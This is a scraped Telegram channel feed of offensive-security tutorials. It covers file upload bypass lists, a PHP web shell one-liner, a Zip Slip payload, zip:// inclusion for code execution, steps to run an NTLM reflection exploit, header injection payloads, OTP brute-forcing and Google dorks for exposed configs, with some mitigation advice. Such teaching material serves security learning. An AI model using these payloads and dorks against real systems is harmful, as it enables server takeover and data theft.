CyberSec Playground | Learn ethical hacking ⚡️
745 subscribers
73 photos
1 video
2 files
188 links
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
Download Telegram
CyberSec Playground | Learn ethical hacking ⚡️
👀 guys what about a WEEK full of file upload tricks and tips?Drop your comments
📂 Beginner's Guide (Part 1 of file upload week) : File Upload Vulnerability
💣 "It’s just a profile picture… or is it?"

🔍 What is a File Upload Vulnerability?

Some websites let users upload files — like images, documents, or PDFs. But if the website doesn’t check the uploaded file properly, an attacker might upload a dangerous file — like a script — that gets executed on the server!

This can lead to:

❗️ Website defacement
🐚 Remote Code Execution (RCE)
🔓 Server access or full control

🧪 Real Example:
A user uploads cat.jpg, but the attacker uploads:
cat.php.jpg or rce.php

If the server:

Accepts the file
Saves it to a public folder
Doesn’t validate it properly

Then the attacker can access http://target.com/uploads/rce.php
And run commands directly on the website!

⚠️ Why Does This Happen?

🔸 Server trusts the file extension (.jpg, .pdf, etc.)
🔸 Server doesn’t check content inside the file
🔸 Upload folder has execution permissions

🛡 How to Stay Safe (for Developers):

Only allow specific file types
Rename uploaded files on the server
Store them in folders without execution rights
Scan uploaded files for malicious content
Use proper libraries for file handling

🎯 Why Should Bug Hunters Care?
This is a very common issue in older CMS, custom admin panels, and web apps. If you find a file upload function — test it! It might be your way to RCE 😈

📚 Stay sharp. Learn vulnerabilities. Hack smart.
🔐 Follow @cybersecplayground for more beginner-to-advanced security tips!

#cybersecurity #bugbounty #fileupload #beginner #infosec #websecurity #webapp #cybersecplayground
💊8🔥3
CyberSec Playground | Learn ethical hacking ⚡️
📂 Beginner's Guide (Part 1 of file upload week) : File Upload Vulnerability 💣 "It’s just a profile picture… or is it?" 🔍 What is a File Upload Vulnerability? Some websites let users upload files — like images, documents, or PDFs. But if the website doesn’t…
🚩 📂 Beginner's Guide (Part 2 of file upload week) :
Exploiting ZIP Uploads for RCE

If a web app lets you upload .zip files… this trick might just get you RCE 😈

🔧 Step-by-step:

1️⃣ Create a PHP payload (e.g. rce.php)
2️⃣ Compress it: zip file.zip
3️⃣ Upload file.zip to the vulnerable web app
4️⃣ Trigger the payload like this:

https://<target>.com/index.php?page=zip://path/file.zip#rce.php

💥 If the server supports dynamic inclusion of ZIP content, your PHP gets executed = Remote Code Execution

🧠 Works on systems with poorly configured ZIP handlers (like some outdated CMS or custom file viewers)

Pro Tip: Always inspect how the app handles uploaded files. If it includes content dynamically using user input — you're in the game.

💣 Happy Hunting!

🔐 Follow @cybersecplayground for more real-world exploit tips & bug bounty gems.

#bugbounty #zipupload #rce #websecurity #infosec #cybersecplayground #exploittips #pentesting
🔥8💊3
🧨 File Upload Bypass Techniques
(Part 3 of file upload)


Uploading a web shell isn’t dead , just harder. Here are smart techniques to bypass file upload restrictions and exploit insecure file handling on the backend. 💻🕳️

🔎 1. Content-Type Bypass
Fake your file type with headers like:

Content-Type: image/png

Then upload a .php or .jsp payload.
🔥 Works if backend trusts headers blindly.

🧩 2. Double Extension Trick

shell.php.jpg  
shell.asp;.jpg
shell.php%00.jpg

Some servers check only the last extension or fail to handle null bytes properly.

📛 3. File Name Obfuscation
Try encoding or using special characters:

shell.pHp  
shell.ph%70

🧠 Some filters are case-sensitive or don’t decode %XX values.

📂 4. MIME Sniffing Abuse
Upload as .txt or .jpg — but insert a magic header for interpretable content.
e.g., PHP payload inside a .jpg with this line on top:

<?php system($_GET['cmd']); ?>

💥 If executed or served unsafely (e.g., Apache misconfig), it may run.

🚫 5. Extension Whitelist Bypass
Try using allowed extensions like:

.htaccess  
.shtm
.svg
.phtml
.asp

Some of these are executable on certain stacks (Apache, IIS, NGINX).

🧬 6. Polyglot Payloads
Build files that are both valid images and code:
• Image with PHP code appended
• PDF with JS payload
• GIF89a header + PHP backdoor

💣 Works if server validates image by magic bytes only.

🚪 7. Upload to External Storage (S3, Cloudinary)
Sometimes upload is secure, but URL is public and executable.
👉 Check for direct-access URLs, bucket misconfigs, or SSRF chains.

🔐 Pro Tip:
Always test for where the file is stored AND how it is handled or rendered.

💻 Want more real-world exploitation tricks like this?
📢 Join the crew: 👉 @cybersecplayground

#FileUpload #FileUploadBypass #BugBountyTips #WebSecurity #CyberSecurity #HackingTools #InfoSec #Pentest #SecurityTesting #EthicalHacking #Payloads #CybersecPlayground #infosec #bugbountytips #cybersec
8👍1💊1
📦 All Our Tools, Payloads & Learning Material — Now on GitHub! 💻

Want to access all the scripts, practice labs, payload lists, and resources we share on the channel?
We’ve organized everything in one place for you:

👉 Follow & give star us on GitHub:
🔗 github.com/cybersecplayground

🧠 You’ll find:
📂 Payload collections
🛠️ Automation tools & fuzzing
💣 Real-world bug bounty techniques
📝 Markdown posts for educational use


📢 Help us grow and contribute back — follow + star the repo if it helped you!
Let’s build a better hacking toolkit, together. 💪
Dont forget, we’re just getting started 🤜🤛

#GitHub #BugBountyTools #CyberSecurity #InfoSec #HackingResources #Payloads #EthicalHacking #OpenSource #CTFtools #CybersecPlayground #FollowUs
🔥8
CyberSec Playground | Learn ethical hacking ⚡️ pinned «📦 All Our Tools, Payloads & Learning Material — Now on GitHub! 💻 Want to access all the scripts, practice labs, payload lists, and resources we share on the channel? We’ve organized everything in one place for you: 👉 Follow & give star us on GitHub: 🔗 g…»
CyberSec Playground | Learn ethical hacking ⚡️
🧨 File Upload Bypass Techniques (Part 3 of file upload) Uploading a web shell isn’t dead , just harder. Here are smart techniques to bypass file upload restrictions and exploit insecure file handling on the backend. 💻🕳️ 🔎 1. Content-Type Bypass Fake your…
🔓 File Upload Bypass – Ultimate Tricklist for Hackers
(Part 4 of file upload)


Many apps restrict certain file types to prevent RCE or LFI. But clever tricks can bypass blacklists & whitelists. Let's break it down 🧠👇

🔥 1. Blacklisting Bypass – Using Alternative Extensions

If .php is blocked, try:
.php, .php2, .php3, .php4, .php5, .php7, .phtml, .phar, .pht, .pgif, .shtml, .htaccess, .inc


For other languages:

ASP:
.asp, .aspx, .asa, .cshtml


JSP:
 .jsp, .jspx


Coldfusion:
 .cfm, .cfc


Perl:
 .pl, .cgi


🌀 Also try random capitalization:

.pHp, .pHP5, .PhAr


⚠️ 2. Whitelisting Bypass – Tricks That Confuse Filters

If .php is allowed only when disguised, try:

file.png.php
file.php%20
file.php%00
file.php%0a
file.php/
file.php.
file.php....
file.png.jpg.php
file.php#.png
file.php%00.png
file.phpJunk123png


📌 Pro Tip: Some filters only validate the extension before %, #, or null-byte (%00). Use it to your advantage!

📁 Goal: Execute your payload on the server by bypassing faulty validation logic in the upload function.

🚀 Used with web shells or command injection for remote code execution (RCE)!

💡 Share with your hunting partner. share to someone who still thinks .php alone is enough 😏

🔐 Join @cybersecplayground for more real-world web hacking tactics.

#fileupload #bugbounty #cybersecurity #pentest #infosec #cybersecplayground #websecurity #rce #bypass #webhacking #tricks
43💊1
CyberSec Playground | Learn ethical hacking ⚡️
🔓 File Upload Bypass – Ultimate Tricklist for Hackers (Part 4 of file upload) Many apps restrict certain file types to prevent RCE or LFI. But clever tricks can bypass blacklists & whitelists. Let's break it down 🧠👇 🔥 1. Blacklisting Bypass – Using Alternative…
Here's a comprehensive list of 100+ PHP file upload payloads, covering various bypass techniques like null bytes, encoding, special characters, and more:

🔗 https://github.com/cybersecplayground/bu...

This list covers:

🔸 Case variations
🔸Multiple/different extensions
🔸Null byte injections (%00)
🔸Special characters (%, #, ;, :, , /)
🔸Whitespace variations (space, %20)
🔸Newline injections (%0a, %0d)
🔸Multiple dots
🔸Fake extensions
🔸Various junk data appendages
🔸Different encoding schemes
🔸Common alternative PHP extensions (php3, php4, etc.)

All payloads are focused solely on PHP file upload bypass techniques. You can use this list for testing file upload functionality in web applications.
🔥63
🚨 Critical NTLM Reflection SMB Flaw PoC (CVE-2025-33073) 🚨

🔍 Vulnerability:
Active exploitation PoC released for an NTLM reflection vulnerability in SMB protocol allowing credential theft and man-in-the-middle attacks.

💥 Proof of Concept:

# Clone the exploit:
git clone https://github.com/mverschu/CVE-2025-33073
# Execute with admin privileges
python exploit.py -t <target_IP>


📌 Impact:
✔️ NTLM credential interception
✔️ SMB relay attacks
✔️ Domain privilege escalation

🛡 Mitigation:

⛏️ Disable NTLM authentication where possible
⛏️ Enable SMB signing
⛏️ Apply vendor patches immediately

🔗 Resources:
GitHub PoC |
Microsoft Security Guidance

🔔 Want more alerts? Join @cybersecplayground for:
Daily exploit PoCs
Exclusive bug bounty tips
Private hacking methodologies

📢 Share with #RedTeam & #BlueTeam!
#BugBounty #CyberSecurity #Hacking #CVE #NTLM #SMB #ExploitDev
6👍1
🔍 Value Fuzzing with FFUF
Discover Hidden Parameters!
Looking to uncover hidden parameters, test API endpoints, or find unexpected values in web applications? ffuf is your go-to tool for fast and flexible fuzzing!

🚀 Basic Value Fuzzing Command
ffuf -u "https://example.com/api?param=FUZZ" -w /path/to/wordlist.txt -fs 100

👉🏻 -u: Target URL with FUZZ placeholder
👉🏻 -w: Wordlist for fuzzing values
👉🏻 -fs 100: Filter out responses with size 100 (adjust as needed)

🔥 Advanced Usage

1. Multiple Parameters Fuzzing
ffuf -u "https://example.com/api?param1=FUZZ&param2=FUZ2Z" -w wordlist1.txt:FUZZ -w wordlist2.txt:FUZ2Z


2. POST Request Fuzzing
ffuf -X POST -u "https://example.com/login" -d 'username=admin&password=FUZZ' -w passwords.txt


3. Using Custom Matchers & Filters
ffuf -u "https://example.com/search?q=FUZZ" -w params.txt -mc 200 -ms "Search results found"

👉🏻 -mc 200: Match HTTP status code
👉🏻 -ms: Match response content

4. Rate Limiting & Delays
ffuf -u "https://example.com/FUZZ" -w dirs.txt -p "0.5" -t 20

👉🏻 -p: Delay between requests (seconds)
👉🏻 -t: Threads (default: 40)

📌 Pro Tips
Use -recursion to auto-fuzz discovered paths
Combine with -H "Header: Value" for auth/cookie-based testing
Try -e .php,.bak,.json for common file extensions

🔗 Get FFUF: https://github.com/ffuf/ffuf

🔐 Join @cybersecplayground for more real-world web hacking tactics.
Have you found anything interesting with ffuf? Share your findings below! 👇

#BugBounty #WebSecurity #PenTesting #FFUF #Fuzzing #CyberSecurity
4💊3🔥2🆒1
🔍 Analyze Malware in Real-Time with ANY.RUN!
Looking for a powerful, interactive malware analysis sandbox? ANY.RUN lets you detonate and analyze suspicious files, URLs, and emails in a secure environment—with real-time results!

🚀 Why ANY.RUN?
Real-Time Analysis – Watch malware execute live
Interactive Debugging – Pause, rewind, and inspect processes
Cloud-Based – No setup required, works in your browser
Threat Intelligence – Auto-extracts IOCs (IPs, Domains, Hashes)
Team Collaboration – Share analysis reports with your security team

🔥 Key Features
👉🏻 Detects ransomware, trojans, spyware, and more
👉🏻 Supports Windows & Linux environments
👉🏻 Integrates with VirusTotal, Hybrid Analysis, and other threat feeds
👉🏻 Generates detailed reports (PDF, JSON, STIX)

🛠 Sample Use Cases
⚡️Incident Response – Quickly analyze phishing attachments
⚡️Threat Hunting – Investigate suspicious network traffic
⚡️Malware Research – Study behavior of new strains

Dont Forget to use tools like any.run to not BEING Fucked , and hacked back by another Hacker 😁

Try ANY.RUN for Free: https://any.run/
Have you used ANY.RUN before?
Share your experience below! 👇

#MalwareAnalysis #CyberSecurity #ThreatHunting #IncidentResponse #ANYRUN #InfoSec
🔥5
🧠 Zip Slip → Arbitrary File Write Exploit

Ever heard of one ZIP file owning the whole server? Let me show you how 👇

🔍 What is Zip Slip?

It’s a vulnerability that occurs when:
1️⃣ A web app extracts user-uploaded .zip archives
2️⃣ It doesn’t sanitize the internal file paths
3️⃣ The .zip contains files like:

../../../../etc/passwd
../../../../var/www/html/shell.php

Result? 💥
➡️ Overwrite system files,
➡️ Drop backdoors,
➡️ Gain RCE,
➡️ Or crash the app with DoS.

⚠️ Real-World Impact

💎 Web shell planted in a public directory
💎 Defacing websites
💎 Privilege escalation or full server takeover

📁 How to Test
Create a .zip archive with:

mkdir test && cd test
echo "<?php system(\$_GET['cmd']); ?>" > ../../../../var/www/html/shell.php
zip -r payload.zip *

Upload to the app. If it extracts without sanitization → RCE 🎯

🛡 Mitigation
Sanitize extracted file paths
Use secure zip libraries (e.g., Java’s ZipEntry.normalize())
Deny path traversal (../) in filenames

💡 Stay sharp: Not all uploads are what they seem. Even a .zip can be lethal.

🔐 Follow @cybersecplayground for more deep hacking insights.

#ZipSlip #bugbounty #fileupload #infosec #RCE #cybersecurity #websecurity #pentest #webhacking #cybersecplayground
5👍1
🚨 Alert: CVE-2025-48952 – Password Bypass in NetAlertX 🚨
Due to loose comparison in PHP, attackers can bypass authentication without knowing the correct password!

🔥 Vulnerability Type:
Weak equality check (== instead of ===) allows login bypass using special inputs like 0, false, or specific crafted passwords.

🔓 Impact:
🔹 Unauthenticated access to the web interface
🔹 Possible full system control depending on configuration

💥 PoC & Details:
🔗 GitHub Advisory
💣 Exploit Code Included – Ready to test!

🛰 Attack Surface Scan

🕵️‍♂️ Hunter Dork
product.name="NetAlertX"

🌐 Hunter Search

🧠 Why It Matters:
Loose type comparison in PHP can be fatal. Always use === for secure checks!

📢 Stay informed with @cybersecplayground — we drop daily 0days, PoCs & hunting tips!

#CVE2025_48952 #NetAlertX #bugbounty #infosec #php #passwordbypass #hunterhow #cybersecplayground #OSINT #RCE #authbypass
🔥7
🚨 Rate Limiting Bypass = Account Takeover Risk 🚨

How to Test for Critical Flaws:
1️⃣ Spam Requests - Burp Intruder/FFuf to send rapid-fire login/OTP attempts
2️⃣ Observe Defenses - No delays/blocks? Bruteforce becomes trivial
3️⃣ Analyze Patterns - Timing variations & response changes reveal weaknesses

Why It Matters:
🔓 Missing rate limits = Open door for credential stuffing/OTP bypass
💸 Low-hanging fruit for bug bounty hunters

💎 Pro Tip: Always test both:
• Standard credential attacks (admin/admin)
• OTP systems (0000 → 9999 enumeration)

📢 Stay informed with @cybersecplayground — we drop daily 0days, PoCs & hunting tips

#BugBounty #WebSecurity #APISecurity #HackerTips
#RateLimitFail #AccountTakeover
3🌭31🔥1
🧠 HTTP Header Injection → Redirect Abuse & Response Splitting

Let’s break down a dangerous bug that’s still alive in many web apps 👇

🔍 Scenario:
An app reflects unsanitized input in HTTP response headers, like:
Location: https://example.com/welcome?user=$input


🧨 Exploitation Steps:

1️⃣ Attacker Input:
test\nSet-Cookie: admin=true


2️⃣ Server Response:
HTTP/1.1 302 Found  
Location: https://example.com/welcome?user=test
Set-Cookie: admin=true


Result:
Attacker injects new headers (e.g., cookies), causing:

🟡 Cache poisoning
🟡 Privilege escalation
🟡 Authentication bypass
🟡 Redirect to phishing pages

🔥 Key Techniques:

Use \n or %0a to break headers
Abuse Location, Referer, Set-Cookie, or custom headers
Combine with open redirects for phishing or SSO bypass

💡 Defensive Tip:
Always validate and encode user input before inserting into HTTP headers!

🎯 Stay ahead of the game — follow @cybersecplayground for daily exploits, CVEs, and bug bounty tactics.

#bugbounty #headerinjection #owasp #authbypass #cachepoisoning #websecurity #cybersecplayground #infosec
🔥71
🧠 Linux for Hackers – Day 1
📍 Introduction & Why Linux Matters in Hacking

Linux is the backbone of most hacking environments. From servers to tools like Kali, Parrot, or BlackArch — it’s built on Linux. If you're serious about cybersecurity, you must master the command line.


🔹 Why Learn Linux?

🔸 90% of hacking tools run natively on Linux
🔸 Customizable environments
🔸 Script everything with Bash or Python
🔸 Essential for CTFs, real-world pentests, bug bounties, and red teaming

🔹 Today’s Task:

🔸 Install Kali Linux (VM or bare metal)
🔸 Open a terminal and type: whoami, uname -a, and pwd
🔸 Understand what each command does.

🛠 Commands to Know:

whoami        # Displays current user  
uname -a # System info (kernel, OS, etc.)
pwd # Shows current working directory

Start simple — the terminal is your new weapon. 🧨

🔗 Follow along daily and level up with us!

👉 Join @cybersecplayground for exclusive hacking content, scripts, and tools.

💬 Like + Share if you’re ready for this journey.

#Linux_for_Hackers
#linux #hacking #cybersecurity #bugbounty #infosec
🆒9👌1
CyberSec Playground | Learn ethical hacking ⚡️
🧠 Linux for Hackers – Day 1 📍 Introduction & Why Linux Matters in Hacking Linux is the backbone of most hacking environments. From servers to tools like Kali, Parrot, or BlackArch — it’s built on Linux. If you're serious about cybersecurity, you must master…
🧠 Linux for Hackers – Day 2
📍 Basic File Navigation in Linux

Before exploiting systems, you need to navigate them blindfolded. Today we focus on mastering file system movement, listing, and directory structure.

🔹 Essential Commands to Practice:
ls        # List directory contents
cd # Change directory
pwd # Print current directory
clear # Clear the terminal
tree # Visualize directory structure
clear # Clear terminal screen
history # View command history


🔹 Try This:
cd /      
ls
cd home
pwd
cd ~


🔸 Bonus Tip:
Use ls -la to see hidden files and their permissions. These often hold credentials or config files.

🧠 Learn the layout of Linux:
/etc: configs
/var: logs
/home: user files
/tmp: temporary files (often abused by hackers)
/root: superuser's home


🔍 Understand where attackers plant files, and how defenders can detect them.

📡 Follow daily lessons on @cybersecplayground
🧠 Learn real skills that apply to hacking, CTFs, red teaming & more.

#Linux_for_Hackers
#linux #hacking #terminal #infosec #cybersecurity #bugbounty
6👍2
⚡️ New Repo & Folders added to Github :

🔗 Bug Bounty Checklist Arsenal
🔗 Collection of high-quality Medium articles
🔗 30-Day Linux for Hackers

⚠️ Dont forget to follow & Give star.
52🍓1
🕵️‍♂️ Google Dorks for Recon & Sensitive Info Disclosure

Quickly find exposed admin panels, backups, configs, and juicy files using these crafted dorks 🔥

🔍 Top Dorks to Try:
intitle:"index of" inurl:ftp intext:admin  
intitle:"index of" "system/config"
intitle:"index of" "admin/config"
"index of" "/config/sql"
intitle:"index of" "api/admin"
intitle:"index of" "tinyfilemanager.php"
intitle:"index of" "test/storage/framework/sessions/"
intitle:"index of" "symfony/config"
intitle:"index of" "graphql/subscription"
intitle:"index of" "/admin/backup"
intitle:"index of" "admin/json"
intitle:"index of" "/admin_backup"
intitle:"index of" "git-jira-log"
intitle:"index of" db.frm
intitle:"index of" "/db_backups/"
intitle:"index of" "common.crt" OR "ca.crt"
intitle:"index of" "global.asa"
intitle:"index of" "proxy.pac" OR "proxy.pac.bak"
intitle:"index of" "MySQL-Router"
intitle:"index of" "owncloud/config/*"

📌 Use with care — many of these lead to sensitive systems (e.g., FTP panels, backup folders, configs, keys) if indexing is enabled.

💻 Tools to Combine:

🔗 Google Search
🔗 Faisal Ahmed's Dork Index
🔗 BullsEye Google Dork Scanner

⚠️ Stay ethical, and only use for authorized testing! 🛡

Follow @cybersecplayground for more recon tips, dorks, scripts, and offensive security tricks 👇

#recon #bugbountytips #googlehacking #osint #bugbounty #cybersecplayground
8👍1
CyberSec Playground | Learn ethical hacking ⚡️
🧠 Linux for Hackers – Day 2 📍 Basic File Navigation in Linux Before exploiting systems, you need to navigate them blindfolded. Today we focus on mastering file system movement, listing, and directory structure. 🔹 Essential Commands to Practice: ls …
🧠 Linux for Hackers – Day 3
📍 Understanding File Permissions & Attributes

As a hacker, knowing how Linux permissions work is critical. Why? Because privilege escalation, file manipulation, and bypassing restrictions all revolve around permission misconfigurations.

🔐 Linux File Permission Format

Use ls -l and you'll see something like:

-rwxr-xr--  1 user group 1337 Jan 1  exploit.sh


Breakdown:

- → file type (- = file, d = directory, l = symlink)
rwx → owner's permissions (read/write/execute)
r-x → group's permissions
r-- → others' permissions

Legend:

r = read
w = write
x = execute

🧠 A file with 777 means anyone can do anything — a dream for attackers.

🎯 Today's Commands:
ls -l             # View file permissions
chmod +x file # Add execute permission
chmod 755 file # Set specific permissions
chown user:group # Change file owner/group


🔓 Try creating a script and modifying its access:
echo 'echo hacked' > test.sh
chmod +x test.sh
./test.sh

Then change its ownership and permissions. Think like an attacker. If you found a script writable by others — could you hijack it?

🚩 Real-World Example:

If /etc/passwd or /etc/shadow is writable, root access is possible.
Watch for misconfigured cron jobs or scripts running with root perms but owned by standard users.

📡 Learn these fundamentals daily on @cybersecplayground
🔗 Practical Linux skills = better hacking, better exploits.

#Linux_for_Hackers
#linux #permissions #hacking #bugbounty #ctf #infosec
👌7